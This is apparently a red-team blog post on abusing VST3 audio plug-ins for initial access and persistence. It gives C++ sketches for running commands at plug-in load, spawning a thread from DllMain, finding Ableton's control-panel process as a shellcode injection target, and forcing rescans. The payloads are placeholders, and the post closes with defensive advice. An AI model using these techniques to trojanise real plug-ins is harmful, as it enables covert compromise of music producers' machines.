VST Audio Plug-ins for Initial Access and Persistence
Abusing Virtual Studio Technology (VST) for red team initial access and persistence.
Background
VST (Virtual Studio Technology) is a software interface standard developed by Steinberg in 1996. VST plug-ins let music producers use digital instruments (synthesisers, drum machines, etc.) and effects (guitar pedals, etc.) inside DAW software such as Ableton Live, Cubase or FL Studio. They play an important role in modern music production environments, with both paid and free/open-source VSTs available from popular sites like KVR Audio.
I know that VST plug-in piracy is common within the producer community (even in professional and enterprise studio environments). With this in mind, I decided to do some reading on the security of the VST standard to see how difficult it would be to tamper with and backdoor a plug-in.
Command Execution
On Windows, a VST3 plug-in is a multi-threaded DLL packaged inside a folder-based bundle (on macOS it's a Mach-O bundle), so creating a simple plug-in that executes some commands should be straightforward. Steinberg publishes a "Hello World" VST3 example plug-in with build instructions on their GitHub, which gives us a simple template to work from (here).
git clone https://github.com/steinbergmedia/vst3_example_plugin_hello_world.git
mkdir build
cd build
cmake ../vst3_example_plugin_hello_world
cmake --build .
Adding command execution is as simple as prepending a system() call to the plug-in's initialisation in "HelloWorldController".
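For illustration, here's a rough sketch of what that change could look like. I'm assuming the controller class name above and a standard Vst::EditController base; the exact class, file and method names in Steinberg's example may differ slightly.

// In the example's controller .cpp (names assumed, adjust to the real class)
#include <cstdlib> // std::system

tresult PLUGIN_API HelloWorldController::initialize (FUnknown* context)
{
    // Run an arbitrary command before the controller performs its normal
    // initialisation. std::system() blocks until the command returns, so a
    // long-running payload should be launched asynchronously instead.
    std::system ("calc.exe"); // benign placeholder command

    // Hand off to the SDK so the plug-in still loads and behaves normally.
    return EditController::initialize (context);
}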
Recompile the plug-in and copy it to the DAW's default VST3 directory. In my case, with Ableton Live on Windows, the default path is:
C:\Program Files\Common Files\VST3\
When the plug-in is loaded in Ableton Live, the command runs without interrupting the DAW, and we see our result.
Persistence
Executing arbitrary code is simple, but a technique for persistence is what makes this especially interesting. Instead of relying on the target to load the VST within their DAW, we can ensure execution as soon as the DAW opens.
When Ableton detects changes to plug-ins in the default VST3 directory, it triggers initialisation by calling into the VST's "DllMain". Therefore, any new plug-in placed in the default directory will execute the next time Ableton is launched.
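To make that concrete, a sketch of a payload hanging off the module entry point is shown below. Note the assumptions: the VST3 SDK's public.sdk sources already define the module entry points (DllMain/InitDll/ExitDll), so in practice you'd add the call there rather than defining a second DllMain, and anything heavy should be kept off the loader lock.

#include <windows.h>

// Payload stub executed on a separate thread so DllMain itself stays minimal.
static DWORD WINAPI PayloadThread (LPVOID)
{
    WinExec ("calc.exe", SW_HIDE); // benign placeholder
    return 0;
}

BOOL WINAPI DllMain (HINSTANCE instance, DWORD reason, LPVOID)
{
    if (reason == DLL_PROCESS_ATTACH)
    {
        DisableThreadLibraryCalls (instance);
        // Queue the payload instead of running it under the loader lock.
        CreateThread (nullptr, 0, PayloadThread, nullptr, 0, nullptr);
    }
    return TRUE;
}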
Using Ableton as an example, consider a simple shellcode runner that executes beacon shellcode within the remote process "AbletonPushCpl.exe". This is Ableton's USB Audio Class Driver Control Panel process, which runs as a child of "explorer.exe" and is present on Windows computers with Ableton installed, ensuring our beacon lives on after the target quits Ableton.
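As a sketch of the targeting step, the runner first needs the PID of that long-lived control panel process. One way to find it, assuming the Toolhelp32 snapshot API and the process name above:

#include <windows.h>
#include <tlhelp32.h>

// Return the PID of the first process whose executable name matches, or 0.
static DWORD FindProcessByName (const wchar_t* exeName)
{
    DWORD pid = 0;
    HANDLE snapshot = CreateToolhelp32Snapshot (TH32CS_SNAPPROCESS, 0);
    if (snapshot == INVALID_HANDLE_VALUE)
        return 0;

    PROCESSENTRY32W entry {};
    entry.dwSize = sizeof (entry);
    if (Process32FirstW (snapshot, &entry))
    {
        do
        {
            if (lstrcmpiW (entry.szExeFile, exeName) == 0)
            {
                pid = entry.th32ProcessID;
                break;
            }
        } while (Process32NextW (snapshot, &entry));
    }
    CloseHandle (snapshot);
    return pid;
}

// The shellcode runner then opens this PID and injects the beacon as described:
// DWORD targetPid = FindProcessByName (L"AbletonPushCpl.exe");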
Note that execution will only occur again if the user re-opens the VST inside Ableton, as initialisation is only triggered when Ableton detects a new or modified VST in the default directory. In theory, the code could automate this, for example by modifying its own file on each run to force a rescan, effectively becoming a self-propagating VST.
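One speculative way to automate it, assuming Ableton's rescan is driven by the plug-in file's last-write timestamp (which I haven't verified), is for the plug-in to touch its own file each time it runs:

#include <windows.h>

// Touch this module's own file so the host sees it as "modified" and
// re-initialises it on the next launch. Purely illustrative.
static void TouchOwnPluginFile ()
{
    HMODULE self = nullptr;
    if (!GetModuleHandleExW (GET_MODULE_HANDLE_EX_FLAG_FROM_ADDRESS |
                             GET_MODULE_HANDLE_EX_FLAG_UNCHANGED_REFCOUNT,
                             reinterpret_cast<LPCWSTR> (&TouchOwnPluginFile), &self))
        return;

    wchar_t path[MAX_PATH] = {};
    if (!GetModuleFileNameW (self, path, MAX_PATH))
        return;

    HANDLE file = CreateFileW (path, FILE_WRITE_ATTRIBUTES,
                               FILE_SHARE_READ | FILE_SHARE_WRITE, nullptr,
                               OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, nullptr);
    if (file == INVALID_HANDLE_VALUE)
        return;

    FILETIME now = {};
    GetSystemTimeAsFileTime (&now);
    SetFileTime (file, nullptr, nullptr, &now); // update last-write time only
    CloseHandle (file);
}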
Conclusion
Detection rates for malicious VST plug-ins remain low, as most security vendors appear to ignore the VST format entirely. Given that most independent music producers, who are probably prime targets for this, typically won't have EDR installed, there's a high chance that targeted attacks would succeed.
Of course, downloading VSTs from unknown sources and running them on personal or domain-joined computers (like those in production studios or universities) is a bad idea. Treat them like any other executable file.
Whilst Ableton and other DAW manufacturers aren't solely responsible for preventing malicious VSTs, I think adding an option to load only VSTs with valid code signatures would be a great starting point for reducing the impact of this vector.
Update: For macOS, there are some interesting articles by SpecterOps and Csaba Fitzl exploring the weaponisation of Apple Audio Units (AU), Apple's competing audio plug-in format to VST, for unsigned code execution and persistence. They are absolutely worth a read: